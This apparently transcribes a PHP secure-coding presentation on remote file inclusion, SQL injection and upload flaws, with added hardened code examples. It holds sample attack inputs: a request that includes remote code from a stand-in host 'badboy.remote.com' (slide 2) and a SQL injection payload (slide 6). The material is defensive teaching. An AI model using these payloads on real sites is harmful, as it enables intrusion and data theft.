Php safe-code
Php safe-code Presentation Transcript

  • 1. PHP Secure Coding (Part 2) @ 徐钦勇 (ken@shopex.cn)
  • 2. Register Globals: Example
    • `<?php include "$path/script.php"; ?>`
    • Submit a request like this:
    • `?path=http%3A%2F%2Fbadboy.remote.com`
    • The script then executes `include 'http://badboy.remote.com/script.php';`
    • This produces a remote file inclusion vulnerability
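As an added example (not from the slides), the vulnerable `include` from slide 2 beside a hardened version. The `scripts/` directory layout, the `SCRIPT_MAP` allow-list and the page names are assumptions; the point is that the raw `$path` value never reaches `include`.

```php
<?php
// Added example, not code from the presentation.
// $path comes from the request, exactly as on slide 2.

// VULNERABLE: the include target is built from untrusted input. With
// allow_url_include=On a value like http://badboy.remote.com pulls in
// remote code; even with it off, "../" sequences reach arbitrary local files.
function include_unsafe(string $path): void
{
    include "$path/script.php";
}

// HARDENED: map a fixed set of short names to files under one base
// directory (assumed layout) and refuse anything not in the map.
const SCRIPT_BASE = __DIR__ . '/scripts';
const SCRIPT_MAP  = [
    'home'    => 'home.php',
    'profile' => 'profile.php',
];

function include_safe(string $name): bool
{
    if (!array_key_exists($name, SCRIPT_MAP)) {
        return false;                          // unknown name: refuse
    }
    $file = SCRIPT_BASE . '/' . SCRIPT_MAP[$name];

    // realpath() resolves symlinks and "../"; confirm the result is still
    // inside the base directory before including it.
    $real = realpath($file);
    $base = realpath(SCRIPT_BASE);
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    include $real;
    return true;
}

// Usage: only an allow-listed key is taken from the request.
$name = $_GET['path'] ?? 'home';
if (!include_safe($name)) {
    http_response_code(400);
    echo 'unknown page';
}
```

The allow-list is the actual control; `realpath()` is a second check in case the map is ever edited to contain a bad entry. Independently of the code, `allow_url_include` should stay `Off` in `php.ini` (its default since it was introduced in PHP 5.2), so that `include` cannot load a URL at all.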
  • 3. XSS: Example
  • 4. SQL Injection: Example
  • 5. Numeric input: a number greater than 2147483647 overflows and becomes negative
  • 6. Query content taken from external input: `?field=version() from injection_login where 1 #`
  • 7. SQL Injection: Solution
    • Filter input data
    • Put input data in single quotes
    • Escape input data with `mysql_real_escape_string()`
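An added example (not from the slides) that applies the three measures of slide 7 to the two inputs of slides 5 and 6. The table `injection_login` and the column name come from the slide 6 payload; the other column names, the connection string and the `id` parameter are assumptions. It uses PDO with bound parameters instead of `mysql_real_escape_string()`, because the `mysql_*` functions were removed in PHP 7.

```php
<?php
// Added example, not code from the presentation.
// Assumed schema: injection_login(id INT, username VARCHAR(64), created_at DATETIME)

// Slide 5: numeric input is validated as an integer inside the column's
// range. A signed MySQL INT tops out at 2147483647; anything larger is
// rejected here instead of being wrapped to a negative number.
function parse_id(string $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => 2147483647],
    ]);
    return $id === false ? null : $id;
}

// Slide 6: a column name cannot be bound as a parameter, so the field from
// the request is compared against an allow-list (assumed column names).
const ALLOWED_FIELDS = ['id', 'username', 'created_at'];

function parse_field(string $raw): ?string
{
    return in_array($raw, ALLOWED_FIELDS, true) ? $raw : null;
}

// Slide 7: the value travels as a bound parameter, so the SQL text never
// contains user data and quoting/escaping is done by the driver.
function fetch_field(PDO $db, string $field, int $id): ?string
{
    // $field passed the allow-list; it is still quoted as an identifier.
    $sql  = sprintf('SELECT `%s` FROM injection_login WHERE id = :id', $field);
    $stmt = $db->prepare($sql);
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_NUM);
    return $row === false ? null : (string) $row[0];
}

// Usage with the kind of input the slides describe.
$id    = parse_id($_GET['id'] ?? '');
$field = parse_field($_GET['field'] ?? 'username');
if ($id === null || $field === null) {
    http_response_code(400);
    exit('bad request');
}
$db = new PDO('mysql:host=localhost;dbname=app;charset=utf8mb4', 'user', 'pass', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepares
]);
echo htmlspecialchars((string) fetch_field($db, $field, $id), ENT_QUOTES, 'UTF-8');
```

With this in place the slide 6 payload `version() from injection_login where 1 #` is rejected by `parse_field()` before any SQL is built, and an id of `2147483648` is rejected by `parse_id()` rather than reaching the database. The final `htmlspecialchars()` is the output-side escaping for the XHTML sink that slide 8 pairs with the MySQL one.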
  • 8. The ultimate cheat sheet (葵花宝典): PHP Script, Filter, Escape; Cookie, Forms, Referer, etc.; XHTML; MySQL
  • 9. File write points: file upload, writing log files
  • 10. File upload: 1. validate the file type 2. validate the file extension
  • 11. File upload: 1. null-byte (00) truncation 2. malformed file names
  • 12. File upload
  • 13. File write points: writing log files
    • Prevent the file from being downloaded
    • Prevent the file from being executed
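An added example (not from the slides) of an upload handler that applies the checks of slides 10 and 11 and the two rules of slide 13. The upload directory, size limit and the extension-to-MIME allow-list are assumptions; the `$_FILES` field name `upload` is assumed too.

```php
<?php
// Added example, not code from the presentation.

const UPLOAD_DIR    = '/var/app/uploads';   // assumed: outside the web root
const MAX_BYTES     = 2 * 1024 * 1024;      // assumed limit
// Extension -> MIME type expected from the file's bytes (assumed list).
const ALLOWED_TYPES = [
    'jpg' => 'image/jpeg',
    'png' => 'image/png',
    'pdf' => 'application/pdf',
];

// Returns the stored path on success, or a string starting with "error:".
function store_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return 'error: upload failed';
    }
    if ($file['size'] > MAX_BYTES) {
        return 'error: too large';
    }
    $orig = (string) $file['name'];

    // Slide 11: reject null bytes and other control characters in the name
    // (00 truncation, malformed names) before interpreting it at all.
    if ($orig === '' || preg_match('/[\x00-\x1f\x7f]/', $orig)) {
        return 'error: malformed file name';
    }

    // Slide 10, check 2: the LAST extension must be on the allow-list, so
    // "shell.php.jpg" is judged by "jpg" and then renamed anyway below.
    $ext = strtolower(pathinfo($orig, PATHINFO_EXTENSION));
    if (!isset(ALLOWED_TYPES[$ext])) {
        return 'error: extension not allowed';
    }

    // Slide 10, check 1: detect the type from the bytes, not from
    // $_FILES['type'], which the client fills in.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime !== ALLOWED_TYPES[$ext]) {
        return 'error: content does not match extension';
    }

    // Slide 13: a server-chosen random name in a directory outside the web
    // root, so the stored file can neither be downloaded directly nor
    // executed by the web server. The client-supplied name is never reused.
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return 'error: could not store file';
    }
    return $dest;
}

// Usage: the file arrives in $_FILES['upload'] from a multipart form.
if (isset($_FILES['upload'])) {
    echo htmlspecialchars(store_upload($_FILES['upload']), ENT_QUOTES, 'UTF-8');
}
```

Files that must later be served go back through a PHP script that reads them from `UPLOAD_DIR` and sets `Content-Type` itself; they are never placed under the document root. The same two rules of slide 13 apply to the log files of slide 9: write them outside the document root, and never give them an extension the web server executes.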
  • 14. Cookie forgery
  • 15. Q&A
  • 16. Reference
    • 高级 PHP 应用程序漏洞审核技术 (Advanced PHP Application Vulnerability Auditing Techniques)